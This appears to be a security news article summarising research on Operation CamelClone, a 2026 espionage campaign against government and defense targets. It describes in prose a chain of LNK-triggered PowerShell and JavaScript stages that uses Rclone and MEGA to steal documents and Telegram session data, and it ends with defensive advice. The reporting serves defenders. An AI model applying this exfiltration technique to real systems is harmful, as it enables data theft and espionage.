A sophisticated cyber espionage campaign, dubbed Operation CamelClone, has been actively targeting government agencies, defense institutions, and diplomatic bodies across multiple nations, including Algeria, Mongolia, Ukraine, and Kuwait. This operation utilizes spear-phishing emails containing malicious ZIP archives, which are designed to resemble official government correspondence. Upon activation, these archives trigger a multi-stage infection chain that ultimately facilitates data theft, employing a legitimate cloud transfer tool.
The initial detection of Operation CamelClone occurred in late February 2026, when a suspicious ZIP file, named after Algeria’s Ministry of Housing, Urban Development, and the City, was uploaded to VirusTotal from Algeria. Shortly thereafter, a second sample surfaced, targeting Mongolia with a theme of “Expanding cooperation with China.” As March progressed, two more samples emerged, one referencing Algerian-Ukrainian cooperation proposals and another targeting Kuwait’s Air Force with a decoy related to defense procurement. These findings confirmed the campaign’s broad geographical reach and its focus on sensitive governmental and defense sectors.
Operation CamelClone: Geopolitical Targets and Sophisticated Tactics
Analysis by Seqrite analysts revealed that while the targeted countries may appear geographically disparate, each holds a significant position within the current global geopolitical landscape. Ukraine remains at the focal point of an ongoing armed conflict. Algeria plays a crucial role in European and African energy politics. Mongolia is navigating complex relationships between China, Russia, and Western partners. Kuwait is a strategic defense partner in the Gulf region. This strategic selection of targets suggests an intelligence-gathering motive rather than financial gain.
The attack vector employed by Operation CamelClone has remained consistent across all observed samples. Each malicious ZIP archive contains a Windows shortcut (LNK) file. This shortcut is accompanied by a convincing decoy image, often displaying an official government logo, such as the Algerian Ministry’s seal, Mongolia’s MonAtom LLC emblem, or the Kuwait Armed Forces crest. The attackers strategically use these recognizable emblems to lend an air of authenticity to the phishing attempts.
Once a victim opens the shortcut file, a hidden PowerShell command is executed silently in the background. This command initiates the download of the subsequent stages of the attack from an anonymous public file-sharing platform. A key aspect of this operation that makes detection challenging is the complete absence of dedicated command-and-control servers.
Abuse of Public File-Sharing and Cloud Storage in CamelClone
Instead of relying on traditional command-and-control infrastructure, Operation CamelClone leverages public file-sharing sites for hosting all its malicious payloads. Specifically, the attackers are utilizing filebulldogs[.]com for this purpose. Furthermore, stolen data is routed through MEGA, a legitimate cloud storage service for exfiltration. This method effectively blends malicious network traffic with ordinary internet activity, significantly complicating detection efforts by standard network monitoring tools.
Inside the infection chain, after the shortcut file is executed, a PowerShell command downloads and immediately runs a JavaScript file named “f.js” from filebulldogs[.]com. Seqrite researchers refer to this loader as HOPPINGANT. This Windows Script Host JavaScript executes two Base64-encoded PowerShell commands to carry out further malicious actions. These commands first download a null-padded decoy Portable Document Format (PDF) file, intended to distract the victim. Subsequently, they retrieve a ZIP archive named “a.zip.”
The “a.zip” archive contains a portable copy of Rclone, a legitimate, open-source cloud file transfer tool, specifically version v1.70.3. After extracting and running Rclone, the script decodes a stored password using a simple XOR method with the key value 56. This password is then used to log into a MEGA account that was registered using an anonymous onionmail.org email address. Once the connection to MEGA is established, the Rclone tool systematically searches the victim’s Desktop for files with extensions like .doc, .docx, .pdf, and .txt. These identified files are then uploaded directly to the attacker’s storage on MEGA.
Additionally, the script targets Telegram session data, specifically from the Telegram Desktop “tdata” directory. This could potentially grant the attackers access to the victim’s private conversations. Across all observed campaigns, four unique MEGA accounts were identified, all of which were reportedly registered in February and March 2026. The consistent use of these methods across multiple targets, as highlighted by the CamelClone campaign, underscores the evolving tactics of cyber adversaries.
Organizations operating in the government, defense, and diplomatic sectors should exercise extreme caution when handling unsolicited ZIP files, particularly those that reference official institutions or defense-related partnerships. Implementing measures such as blocking access to anonymous file-sharing platforms and closely monitoring outbound traffic to cloud storage services like MEGA can significantly limit exposure. Furthermore, restricting the execution of LNK files from untrusted sources and deploying behavior-based endpoint detection solutions can help to halt the PowerShell and JavaScript-based execution chain before it can complete its objectives.